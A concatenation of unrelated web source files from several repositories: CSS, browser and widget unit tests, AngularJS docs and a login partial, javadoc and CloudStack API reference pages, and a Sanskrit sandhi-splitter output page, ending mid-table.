{if $CURRENT eq $LAST}
<li class="disabled">
<span class="next"><i class="icon-next"></i></span>
</li>
{else}
<li>
<a href="{url path={navigate to="current"} page={$NEXT} }" title="{intl l="Next"}" class="next"><i class="icon-next"></i></a>
</li>
{/if}
{/if}
{/pageloop}
</ul>
</div>
{/if}
{/if}
</div>
|
tpl/static/tpl/1117/css/index36.css
|
royalwang/saivi
|
.btn-up-1{ background: #999;}
.btn-up-1 .fa{ background: #fff; color: #999;}
.navPop-1 .navPop-btn{ background: #999;}
.navPop-1 .navPop-btn .fa{ background: #fff; color: #999;}
.navPop-wrap>div a{
background: #999;
color: #fff;
}
|
webapi/tct-filesystem-tizen-tests/filesystem/File_readAsText.html
|
qiuzhong/crosswalk-test-suite
|
<!DOCTYPE html>
<!--
Copyright (c) 2013 Samsung Electronics Co., Ltd.
Licensed under the Apache License, Version 2.0 (the License);
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Authors:
Beata Koziarek <b.koziarek@samsung.com>
Mariusz Polasinski <m.polasinski@samsung.com>
-->
<html>
<head>
<title>File_readAsText</title>
<meta charset="utf-8"/>
<script src="support/unitcommon.js"></script>
<script src="support/filesystem_common.js"></script>
</head>
<body>
<div id="log"></div>
<script type="text/javascript">
//==== TEST: File_readAsText
//==== LABEL Check if File::readAsText() method works properly without errorCallback
//==== SPEC: Tizen Web API:IO:Filesystem:File:readAsText M
//==== SPEC_URL https://developer.tizen.org/help/topic/org.tizen.web.device.apireference/tizen/filesystem.html
//==== TEST_CRITERIA MMINA MR
var t = async_test(document.title), resolveSuccess, resolveError, stringInFile = "HelloWorld",
readAsTextSuccess, file, fsTestFileName = getFileName("testReadAsTextAgain.txt"), retVal = null;
t.step(function () {
readAsTextSuccess = t.step_func(function (str) {
assert_equals(retVal, undefined, "incorrect returned value");
assert_equals(str, stringInFile, "incorrect read value");
t.done();
});
resolveSuccess = t.step_func(function (dir) {
file = dir.createFile(fsTestFileName);
file.openStream("w",
t.step_func(function (fs) {
fs.write(stringInFile);
fs.close();
retVal = file.readAsText(readAsTextSuccess);
}));
});
resolveError = t.step_func(function (error) {
assert_unreached("resolve() error callback invoked: name: " + error.name + ", msg: " + error.message);
});
prepareForTesting(t,
function () {
tizen.filesystem.resolve("documents", resolveSuccess, resolveError, "rw");
}
);
});
</script>
</body>
</html>
|
tests/slider/LayerOpacity.html
|
bentrm/geoext2
|
<!DOCTYPE html>
<html debug="true">
<head>
<!--
Loads the resources of ExtJS and OpenLayers.
Use the URL-parameter `extjs` to require a specific
version of Ext, e.g. `LayerOpacity.html?extjs=5.0.1`
-->
<script src="../../examples/include-ext.js"></script>
<script src="http://openlayers.org/api/2.13.1/OpenLayers.js"></script>
<script type="text/javascript">
Ext.Loader.setConfig({
disableCaching: false,
enabled: true,
paths: {
GeoExt: '../../src/GeoExt'
}
});
Ext.Loader.syncRequire([
'GeoExt.panel.Map',
'GeoExt.slider.LayerOpacity'
]);
function test_constructor(t) {
t.plan(8);
var record, store, slider;
var store = Ext.create('GeoExt.data.LayerStore', {
data : [
new OpenLayers.Layer("a")
]
});
record = store.getAt(0);
var layer = record.getLayer();
slider = Ext.create("GeoExt.slider.LayerOpacity", {
layer: record
});
t.eq(slider.layer.id, record.get("id"), "layer parameter is a GeoExt.data.LayerRecord");
slider.destroy();
slider = Ext.create("GeoExt.slider.LayerOpacity", {
layer: layer
});
t.eq(layer.id, slider.layer.id, "layer parameter is a OpenLayers.Layer.WMS");
slider.destroy();
slider = Ext.create("GeoExt.slider.LayerOpacity", {
layer: layer
});
t.eq(slider.value, 100,
"ctor sets value to max value if layer opacity is " +
"null and value isn't defined in config");
slider = Ext.create("GeoExt.slider.LayerOpacity", {
layer: layer,
changeVisibility: true
});
t.eq(slider.changeVisibility, true,
"ctor sets changeVisibility to true in instance");
slider.destroy();
layer.setOpacity(0.0);
slider = Ext.create("GeoExt.slider.LayerOpacity", {
layer: layer,
changeVisibility: true
});
t.eq(layer.getVisibility(), false,
"ctor makes layer invisible if layer opacity is 0");
layer.setVisibility(true);
slider.destroy();
layer.setOpacity(0.5);
slider = Ext.create("GeoExt.slider.LayerOpacity",{
layer: layer,
changeVisibility: true
});
t.eq(layer.getVisibility(), true,
"ctor does not change layer visibility if layer opacity is non 0");
slider.destroy();
layer.opacity = null;
slider = Ext.create("GeoExt.slider.LayerOpacity", {
layer: layer,
value: 0,
changeVisibility: true
});
t.eq(layer.getVisibility(), false,
"ctor makes layer invisible if layer opacity is " +
"null and value is min value");
layer.setVisibility(true);
slider.destroy();
layer.opacity = null;
slider = Ext.create("GeoExt.slider.LayerOpacity", {
layer: layer,
value: 0.5,
changeVisibility: true
});
t.eq(layer.getVisibility(), true,
"ctor does not change layer visibility if layer " +
"opacity is null and value is not min value");
layer.setVisibility(true);
slider.destroy();
}
function test_constructor_complementary(t) {
t.plan(5);
var layer1, layer2, record1, record2, slider;
var store = Ext.create('GeoExt.data.LayerStore', {
data : [
new OpenLayers.Layer("1"),
new OpenLayers.Layer("2")
]
});
var layer1 = store.getAt(0).getLayer();
var layer2 = store.getAt(1).getLayer();
record1 = store.getAt(0);
record2 = store.getAt(1);
slider = Ext.create("GeoExt.slider.LayerOpacity", {
layer: layer1,
complementaryLayer: layer2
});
t.ok(slider.complementaryLayer == layer2,
"ctor correctly sets complementary layer in " +
"the instance [layer]");
slider.destroy();
slider = Ext.create("GeoExt.slider.LayerOpacity", {
layer: record1,
complementaryLayer: record2
});
t.ok(slider.complementaryLayer == layer2,
"ctor correctly sets complementary layer in " +
"the instance [record]");
slider.destroy();
layer1.setOpacity(1);
slider = Ext.create("GeoExt.slider.LayerOpacity", {
layer: layer1,
complementaryLayer: layer2
});
t.eq(layer2.getVisibility(), false,
"ctor makes complementary layer invisible if the " +
"main layer opacity is 1");
layer2.setVisibility(true);
slider.destroy();
layer1.setOpacity(0.5);
slider = Ext.create("GeoExt.slider.LayerOpacity", {
layer: layer1,
complementaryLayer: layer2
});
t.eq(layer2.getVisibility(), true,
"ctor does not change complementary layer visibility "+
"if the main layer opacity is not 1");
slider.destroy();
layer1.opacity = null;
slider = Ext.create("GeoExt.slider.LayerOpacity", {
layer: layer1,
complementaryLayer: layer2,
value: 100
});
t.eq(layer2.getVisibility(), false,
"ctor makes complementary layer invisible if the " +
"main layer opacity is null but the slider " +
"value is set to max value in the config");
slider.destroy();
}
function test_initalOpacity(t) {
t.plan(3);
var slider = new GeoExt.LayerOpacitySlider({
layer: new OpenLayers.Layer('foo')
});
t.ok(slider.getValue() == 100,
"set the value to 100 if the layer has no opacity");
slider.destroy();
slider = new GeoExt.LayerOpacitySlider({
layer: new OpenLayers.Layer('foo', { opacity: 0 })
});
t.ok(slider.getValue() == 0,
"initial layer's opacity sets the slider value");
slider.destroy();
slider = new GeoExt.LayerOpacitySlider({
layer: new OpenLayers.Layer('foo', { opacity: 0.42 })
});
t.ok(slider.getValue() == 42,
"initial layer's opacity sets the slider value");
slider.destroy();
}
function test_aggressive(t) {
t.plan(2);
var slider1 = new GeoExt.LayerOpacitySlider({
renderTo: document.body,
layer: new OpenLayers.Layer('foo'),
aggressive: false
});
slider1.on({
changecomplete: function() {
t.ok(true, "changecomplete triggered in non-aggressive mode");
}
});
var slider2 = new GeoExt.LayerOpacitySlider({
renderTo: document.body,
layer: new OpenLayers.Layer('foo'),
aggressive: true
});
slider2.on({
change: function() {
t.ok(true, "change triggered in aggressive mode");
}
});
slider1.setValue(42, undefined, true);
slider2.setValue(42, undefined, true);
slider1.destroy();
slider2.destroy();
}
function test_visibility(t) {
t.plan(3);
var slider, layer;
layer = new OpenLayers.Layer("a");
slider = new GeoExt.LayerOpacitySlider({
renderTo: document.body,
layer: layer,
changeVisibility: true,
changeVisibilityDelay: 0
});
slider.setValue(slider.minValue);
t.eq(layer.getVisibility(), false,
"setting slider value to min value makes the " +
"layer invisible");
slider.setValue(slider.minValue + 1);
t.eq(layer.getVisibility(), true,
"setting slider value to some value different " +
"than min value makes the layer visible again");
slider.setValue(slider.minValue + 2);
t.eq(layer.getVisibility(), true,
"setting slider value to some other value different " +
"than min value does not make the layer invisible");
slider.destroy();
}
function test_visibility_complementary_layer(t) {
t.plan(4);
var layer1, layer2, slider;
var layer1 = new OpenLayers.Layer("1");
var layer2 = new OpenLayers.Layer("2");
slider = new GeoExt.LayerOpacitySlider({
renderTo: document.body,
layer: layer1,
complementaryLayer: layer2,
changeVisibilityDelay: 0
});
slider.value = 99;
slider.setValue(slider.maxValue);
t.eq(layer2.getVisibility(), false,
"setting slider value to max value makes " +
"complementary layer invisible");
slider.setValue(slider.maxValue - 1);
t.eq(layer2.getVisibility(), true,
"setting slider value to some value different " +
"than max value makes the complementary layer " +
"visible again");
slider.setValue(slider.maxValue - 2);
t.eq(layer2.getVisibility(), true,
"setting slider value to some other value different " +
"than max value does not make the complementary layer " +
"invisible");
slider.setValue(slider.minValue);
t.eq(layer2.getVisibility(), true,
"setting slider value to min value does not make " +
"the complementary layer invisible");
slider.destroy();
}
function test_setlayer(t) {
t.plan(2);
var layer1, layer2, slider;
layer1 = new OpenLayers.Layer("1");
layer1.setOpacity(0.3);
layer2 = new OpenLayers.Layer("2");
layer2.setOpacity(0.6);
slider = new GeoExt.LayerOpacitySlider({
renderTo: document.body,
value: 100
});
slider.setLayer(layer1);
t.eq(slider.getValue(), 30, "Opacity of first layer is used");
slider.setLayer(layer2);
t.eq(slider.getValue(), 60, "Opacity of second layer is used");
slider.destroy();
}
function test_changelayerEvent(t) {
t.plan(2);
var map = new OpenLayers.Map();
var layer1 = new OpenLayers.Layer("1");
var layer2 = new OpenLayers.Layer("2");
map.addLayers([layer1, layer2]);
slider = new GeoExt.LayerOpacitySlider({
layer: layer1,
renderTo: document.body,
value: 100
});
slider.setLayer(layer1);
layer1.setOpacity(0.9);
t.eq(slider.getValue(), 90, "value set from changelayer event");
layer2.setOpacity(0.1);
t.eq(slider.getValue(), 90, "listen to the right layer");
map.destroy();
slider.destroy();
}
function test_inverse(t) {
t.plan(2);
var map = new OpenLayers.Map();
var layer1 = new OpenLayers.Layer("1");
var layer2 = new OpenLayers.Layer("2");
map.addLayers([layer1, layer2]);
slider = new GeoExt.LayerOpacitySlider({
layer: layer1,
inverse: true,
renderTo: document.body
});
slider.setLayer(layer1);
layer1.setOpacity(0.9);
t.eq(slider.getValue(), 10, "value set correctly from changelayer event when inverse is true");
slider.setValue(40, undefined, true);
t.eq(layer1.opacity, 0.6, "opacity set correctly through slider move when inverse is true");
map.destroy();
slider.destroy();
}
function test_inverse_visibility(t) {
t.plan(4);
var layer1, layer2, slider;
var layer1 = new OpenLayers.Layer("1");
var layer2 = new OpenLayers.Layer("2");
slider = new GeoExt.LayerOpacitySlider({
renderTo: document.body,
layer: layer1,
complementaryLayer: layer2,
inverse: true,
changeVisibilityDelay: 0
});
slider.value = 99;
slider.setValue(slider.minValue);
t.eq(layer2.getVisibility(), false,
"setting slider value to min value makes " +
"complementary layer invisible");
slider.setValue(slider.maxValue - 1);
t.eq(layer2.getVisibility(), true,
"setting slider value to some value different " +
"than min value makes the complementary layer " +
"visible again");
slider.setValue(slider.maxValue - 2);
t.eq(layer2.getVisibility(), true,
"setting slider value to some other value different " +
"than min value does not make the complementary layer " +
"invisible");
slider.setValue(slider.maxValue);
t.eq(layer2.getVisibility(), true,
"setting slider value to max value does not make " +
"the complementary layer invisible");
slider.destroy();
}
function test_setValue_called_once(t) {
t.plan(1);
var map, layer, slider, log;
map = new OpenLayers.Map("div");
layer = new OpenLayers.Layer("");
map.addLayer(layer);
slider = new GeoExt.LayerOpacitySlider({
renderTo: document.body,
layer: layer,
aggressive: true,
delay: undefined
});
slider.setValue = function(v) {
log.cnt++;
log.v = v;
GeoExt.LayerOpacitySlider.prototype.setValue.apply(
this, arguments);
};
log = {cnt: 0};
slider.setValue(50);
t.eq(log.cnt, 1,
"setValue called exactly once");
slider.destroy();
map.destroy();
}
</script>
<body>
<div id="map"></div>
</body>
</html>
|
third_party/blink/web_tests/compositing/gestures/gesture-tapHighlight-nested-cursor.html
|
nwjs/chromium.src
|
<!DOCTYPE html>
<html>
<head>
<script src="resources/link-highlight-helper.js"></script>
<link rel="stylesheet" type="text/css" href="resources/link-highlight-style.css">
<style>
#outerDiv {
width: 150px;
}
#outerDiv, #outerDiv div {
padding: 15px;
border-style: solid;
}
</style>
</head>
<body onload="runTest();">
<div class="opaqueHighlight" id="outerDiv" style="cursor: pointer">
<div style="cursor: pointer;">
<div style="cursor: default;">
<div id="innerDiv"></div>
</div>
</div>
</div>
<script>
function runTest() {
useMockHighlight();
var clientRect = document.getElementById("innerDiv").getBoundingClientRect();
x = (clientRect.left + clientRect.right) / 2;
y = (clientRect.top + clientRect.bottom) / 2;
if (window.testRunner)
testRunner.waitUntilDone();
if (window.eventSender) {
eventSender.gestureShowPress(x, y);
window.setTimeout(function() { testRunner.notifyDone(); }, 0);
} else {
debug("This test requires DumpRenderTree.");
}
}
</script>
</body>
</html>
|
web/bundles/sunraangular/js/angular/angular-1.3.3/docs/partials/api/ng/service.html
|
viral810/ngSimpleCMS
|
<h1>Service components in <code>ng</code></h1>
<div class="component-breakdown">
<div>
<table class="definition-table">
<tr>
<th>Name</th>
<th>Description</th>
</tr>
<tr>
<td><a href="api/ng/service/$anchorScroll">$anchorScroll</a></td>
<td><p>When called, it checks the current value of <a href="api/ng/service/$location#hash">$location.hash()</a> and
scrolls to the related element, according to the rules specified in the
<a href="http://dev.w3.org/html5/spec/Overview.html#the-indicated-part-of-the-document">Html5 spec</a>.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$animate">$animate</a></td>
<td><p>The $animate service provides rudimentary DOM manipulation functions to
insert, remove and move elements within the DOM, as well as adding and removing classes.
This service is the core service used by the ngAnimate $animator service which provides
high-level animation hooks for CSS and JavaScript.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$cacheFactory">$cacheFactory</a></td>
<td><p>Factory that constructs <a href="api/ng/type/$cacheFactory.Cache">Cache</a> objects and gives access to
them.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$templateCache">$templateCache</a></td>
<td><p>The first time a template is used, it is loaded in the template cache for quick retrieval. You
can load templates directly into the cache in a <code>script</code> tag, or by consuming the
<code>$templateCache</code> service directly.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$compile">$compile</a></td>
<td><p>Compiles an HTML string or DOM into a template and produces a template function, which
can then be used to link <a href="api/ng/type/$rootScope.Scope"><code>scope</code></a> and the template together.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$controller">$controller</a></td>
<td><p><code>$controller</code> service is responsible for instantiating controllers.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$document">$document</a></td>
<td><p>A <a href="api/ng/function/angular.element">jQuery or jqLite</a> wrapper for the browser's <code>window.document</code> object.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$exceptionHandler">$exceptionHandler</a></td>
<td><p>Any uncaught exception in angular expressions is delegated to this service.
The default implementation simply delegates to <code>$log.error</code> which logs it into
the browser console.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$filter">$filter</a></td>
<td><p>Filters are used for formatting data displayed to the user.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$http">$http</a></td>
<td><p>The <code>$http</code> service is a core Angular service that facilitates communication with the remote
HTTP servers via the browser's <a href="https://developer.mozilla.org/en/xmlhttprequest">XMLHttpRequest</a>
object or via <a href="http://en.wikipedia.org/wiki/JSONP">JSONP</a>.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$httpBackend">$httpBackend</a></td>
<td><p>HTTP backend used by the <a href="api/ng/service/$http">service</a> that delegates to
XMLHttpRequest object or JSONP and deals with browser incompatibilities.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$interpolate">$interpolate</a></td>
<td><p>Compiles a string with markup into an interpolation function. This service is used by the
HTML <a href="api/ng/service/$compile">$compile</a> service for data binding. See
<a href="api/ng/provider/$interpolateProvider">$interpolateProvider</a> for configuring the
interpolation markup.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$interval">$interval</a></td>
<td><p>Angular's wrapper for <code>window.setInterval</code>. The <code>fn</code> function is executed every <code>delay</code>
milliseconds.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$locale">$locale</a></td>
<td><p>$locale service provides localization rules for various Angular components. As of right now the
only public api is:</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$location">$location</a></td>
<td><p>The $location service parses the URL in the browser address bar (based on the
<a href="https://developer.mozilla.org/en/window.location">window.location</a>) and makes the URL
available to your application. Changes to the URL in the address bar are reflected into
$location service and changes to $location are reflected into the browser address bar.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$log">$log</a></td>
<td><p>Simple service for logging. Default implementation safely writes the message
into the browser's console (if present).</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$parse">$parse</a></td>
<td><p>Converts Angular <a href="guide/expression">expression</a> into a function.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$q">$q</a></td>
<td><p>A service that helps you run functions asynchronously, and use their return values (or exceptions)
when they are done processing.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$rootElement">$rootElement</a></td>
<td><p>The root element of Angular application. This is either the element where <a href="api/ng/directive/ngApp">ngApp</a> was declared or the element passed into
<a href="api/ng/function/angular.bootstrap"><code>angular.bootstrap</code></a>. The element represent the root element of application. It is also the
location where the applications <a href="api/auto/service/$injector">$injector</a> service gets
published, it can be retrieved using <code>$rootElement.injector()</code>.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$rootScope">$rootScope</a></td>
<td><p>Every application has a single root <a href="api/ng/type/$rootScope.Scope">scope</a>.
All other scopes are descendant scopes of the root scope. Scopes provide separation
between the model and the view, via a mechanism for watching the model for changes.
They also provide an event emission/broadcast and subscription facility. See the
<a href="guide/scope">developer guide on scopes</a>.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$sceDelegate">$sceDelegate</a></td>
<td><p><code>$sceDelegate</code> is a service that is used by the <code>$sce</code> service to provide <a href="api/ng/service/$sce">Strict
Contextual Escaping (SCE)</a> services to AngularJS.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$sce">$sce</a></td>
<td><p><code>$sce</code> is a service that provides Strict Contextual Escaping services to AngularJS.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$templateRequest">$templateRequest</a></td>
<td><p>The <code>$templateRequest</code> service downloads the provided template using <code>$http</code> and, upon success,
stores the contents inside of <code>$templateCache</code>. If the HTTP request fails or the response data
of the HTTP request is empty then a <code>$compile</code> error will be thrown (the exception can be thwarted
by setting the 2nd parameter of the function to true).</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$timeout">$timeout</a></td>
<td><p>Angular's wrapper for <code>window.setTimeout</code>. The <code>fn</code> function is wrapped into a try/catch
block and delegates any exceptions to
<a href="api/ng/service/$exceptionHandler">$exceptionHandler</a> service.</p>
</td>
</tr>
<tr>
<td><a href="api/ng/service/$window">$window</a></td>
<td><p>A reference to the browser's <code>window</code> object. While <code>window</code>
is globally available in JavaScript, it causes testability problems, because
it is a global variable. In angular we always refer to it through the
<code>$window</code> service, so it may be overridden, removed or mocked for testing.</p>
</td>
</tr>
</table>
</div>
</div>
|
partials/login.html
|
ZM-git/TaskBoard
|
<div id="login" class="login-container" data-ng-controller="LoginCtrl">
<div class="bg-danger text-danger login-error" data-ng-repeat="error in errors"><p>{{ error }}</p></div>
<form class="form-signin" role="form" data-ng-submit="logIn(formdata)" novalidate>
<h2 class="form-signin-heading">TaskBoard - Sign in</h2>
<fieldset data-ng-disabled="isSaving">
<input type="text" class="form-control" placeholder="Username" required autofocus data-ng-model="formdata.username">
<input type="password" class="form-control" placeholder="Password" required data-ng-model="formdata.password">
<label class="checkbox">
<input type="checkbox" data-ng-model="formdata.rememberme"> Remember me
</label>
<button class="btn btn-lg btn-primary btn-block" type="submit">Sign in</button>
</fieldset>
<p class="small text-center version">{{ version }}</p>
</form>
</div>
<div data-on-load-callback="clear"></div>
|
testapps/testapp_flask/static/style.css
|
kived/python-for-android
|
h1 {
font-size: 30px;
color: blue;
font-weight: bold;
text-align:center;
}
h2 {
text-align:center;
}
button {
margin-left: auto;
margin-right: auto;
display: block;
margin-top: 50px;
font-size: 30px;
}
/* Loader from http://projects.lukehaas.me/css-loaders/#load1 */
.loader,
.loader:before,
.loader:after {
background: #aaaaff;
-webkit-animation: load1 1s infinite ease-in-out;
animation: load1 1s infinite ease-in-out;
width: 1em;
height: 4em;
}
.loader:before,
.loader:after {
position: absolute;
top: 0;
content: '';
}
.loader:before {
left: -1.5em;
}
.loader {
text-indent: -9999em;
margin: 8em auto;
position: relative;
font-size: 11px;
-webkit-animation-delay: -0.16s;
animation-delay: -0.16s;
}
.loader:after {
left: 1.5em;
-webkit-animation-delay: -0.32s;
animation-delay: -0.32s;
}
@-webkit-keyframes load1 {
0%,
80%,
100% {
box-shadow: 0 0 #aaaaff;
height: 4em;
}
40% {
box-shadow: 0 -2em #aaaaff;
height: 5em;
}
}
@keyframes load1 {
0%,
80%,
100% {
box-shadow: 0 0 #aaaaff;
height: 4em;
}
40% {
box-shadow: 0 -2em #aaaaff;
height: 5em;
}
}
|
test/input/in_1055304.html
|
geoffmcl/tidy-test
|
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>1055304</title>
</head>
<body>
<img src="xx.png" alt="" ismap>
<a href="aa"><img src="xx.png" alt="" ismap></a>
</body>
</html>
|
doc/program-ab-reference-doc/constant-values.html
|
cosimoiaia/pyAiml-2.0
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_25) on Wed Jul 23 10:47:42 EDT 2014 -->
<meta http-equiv="Content-Type" content="text/html" charset="UTF-8">
<title>Constant Field Values</title>
<meta name="date" content="2014-07-23">
<link rel="stylesheet" type="text/css" href="stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Constant Field Values";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="overview-summary.html">Overview</a></li>
<li>Package</li>
<li>Class</li>
<li><a href="overview-tree.html">Tree</a></li>
<li><a href="deprecated-list.html">Deprecated</a></li>
<li><a href="index-files/index-1.html">Index</a></li>
<li><a href="help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="index.html?constant-values.html" target="_top">Frames</a></li>
<li><a href="constant-values.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h1 title="Constant Field Values" class="title">Constant Field Values</h1>
<h2 title="Contents">Contents</h2>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="overview-summary.html">Overview</a></li>
<li>Package</li>
<li>Class</li>
<li><a href="overview-tree.html">Tree</a></li>
<li><a href="deprecated-list.html">Deprecated</a></li>
<li><a href="index-files/index-1.html">Index</a></li>
<li><a href="help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="index.html?constant-values.html" target="_top">Frames</a></li>
<li><a href="constant-values.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
uohCorpus.fil/uoh/uoh.filteredcorpus.txt_output/Sanskritkathakunj_ext.txt.out.dict_10266_sam.html
|
sanskritiitd/sanskrit
|
url: http://sanskrit.uohyd.ac.in/cgi-bin/scl/sandhi_splitter/sandhi_splitter.cgi?encoding=Unicode&sandhi_type=s&word=कविस्तु<div id='finalout' style='border-style:solid; border-width:1px;padding:10px;color:blue;font-size:14px;height:200px'>कविस्तु = <a title = "कवि पुं 1 एक/कवि स्त्री 1 एक">कविः</a>+<a title = "तु अव्य">तु</a>/<script type="text/javascript">
function toggleMe(a){
var e=document.getElementById(a);
if(!e)return true;
if(e.style.display=="none"){
e.style.display="block";document.getElementById("more").style.display="none"; document.getElementById("less").style.display="block";
}
else{
e.style.display="none";document.getElementById("less").style.display="none"; document.getElementById("more").style.display="block";
}
return true;
}
</script>
<input type="button" onclick="return toggleMe('para1')" value="More" id="more"> <input type="button" onclick="return toggleMe('para1')" value="Less" id="less" style="display:none;" > <div id="para1" style="display:none; height:15px; border-style:none;border-width:1px;">
<a title = "कवि पुं 1 एक/कवि स्त्री 1 एक">कविः</a>+<a title = "तु अव्य">तु</a>/<a title = "कवि नपुं 1 एक/कवि नपुं 2 एक/कवि नपुं 8 एक">कवि</a>+<a title = "स्तु नपुं 1 एक/स्तु नपुं 2 एक/स्तु नपुं 8 एक">स्तु</a>/<a title = "क पुं 8 एक/क नपुं 8 एक">क</a>+<a title = "वि पुं 1 एक">विः</a>+<a title = "तु अव्य">तु</a>/<a title = "कु स्त्री 8 एक">को</a>+<a title = "इ पुं 1 एक">इः</a>+<a title = "तु अव्य">तु</a>/<a title = "क पुं 8 एक/क नपुं 8 एक">क</a>+<a title = "वि अव्य/ऊ स्त्री 7 एक/वि नपुं 1 एक/वि नपुं 2 एक/वि नपुं 8 एक/वी पुं 8 एक/वी स्त्री 8 एक/वी नपुं 1 एक/वी नपुं 2 एक/वी नपुं 8 एक/न्सुलू नपुं 7 एक">वि</a>+<a title = "स्तु नपुं 1 एक/स्तु नपुं 2 एक/स्तु नपुं 8 एक">स्तु</a>/</div><br />
|
source/api/apidocs-4.5/root_admin/registerSSHKeyPair.html
|
resmo/cloudstack-www
|
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 1.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="../includes/main.css" type="text/css">
<link rel="shortcut icon" href="../favicon.ico" type="image/x-icon">
<title>Apache CloudStack | The Power Behind Your Cloud</title>
</head>
<body>
<div id="insidetopbg">
<div id="inside_wrapper">
<div class="uppermenu_panel">
<div class="uppermenu_box"></div>
</div>
<div id="main_master">
<div id="inside_header">
<div class="header_top">
<a class="cloud_logo" href="http://cloudstack.org"></a>
<div class="mainemenu_panel"></div>
</div>
</div>
<div id="main_content">
<div class="inside_apileftpanel">
<div class="inside_contentpanel" style="width:930px;">
<div class="api_titlebox">
<div class="api_titlebox_left">
<span>
Apache CloudStack v4.5.0 Root Admin API Reference
</span>
<p></p>
<h1>registerSSHKeyPair</h1>
<p>Register a public key in a keypair under a certain name</p>
</div>
<div class="api_titlebox_right">
<a class="api_backbutton" href="../TOC_Root_Admin.html"></a>
</div>
</div>
<div class="api_tablepanel">
<h2>Request parameters</h2>
<table class="apitable">
<tr class="hed">
<td style="width:200px;"><strong>Parameter Name</strong></td><td style="width:500px;">Description</td><td style="width:180px;">Required</td>
</tr>
<tr>
<td style="width:200px;"><strong>name</strong></td><td style="width:500px;"><strong>Name of the keypair</strong></td><td style="width:180px;"><strong>true</strong></td>
</tr>
<tr>
<td style="width:200px;"><strong>publickey</strong></td><td style="width:500px;"><strong>Public key material of the keypair</strong></td><td style="width:180px;"><strong>true</strong></td>
</tr>
<tr>
<td style="width:200px;"><i>account</i></td><td style="width:500px;"><i>an optional account for the ssh key. Must be used with domainId.</i></td><td style="width:180px;"><i>false</i></td>
</tr>
<tr>
<td style="width:200px;"><i>domainid</i></td><td style="width:500px;"><i>an optional domainId for the ssh key. If the account parameter is used, domainId must also be used.</i></td><td style="width:180px;"><i>false</i></td>
</tr>
<tr>
<td style="width:200px;"><i>projectid</i></td><td style="width:500px;"><i>an optional project for the ssh key</i></td><td style="width:180px;"><i>false</i></td>
</tr>
</table>
</div>
<div class="api_tablepanel">
<h2>Response Tags</h2>
<table class="apitable">
<tr class="hed">
<td style="width:200px;"><strong>Response Name</strong></td><td style="width:500px;">Description</td>
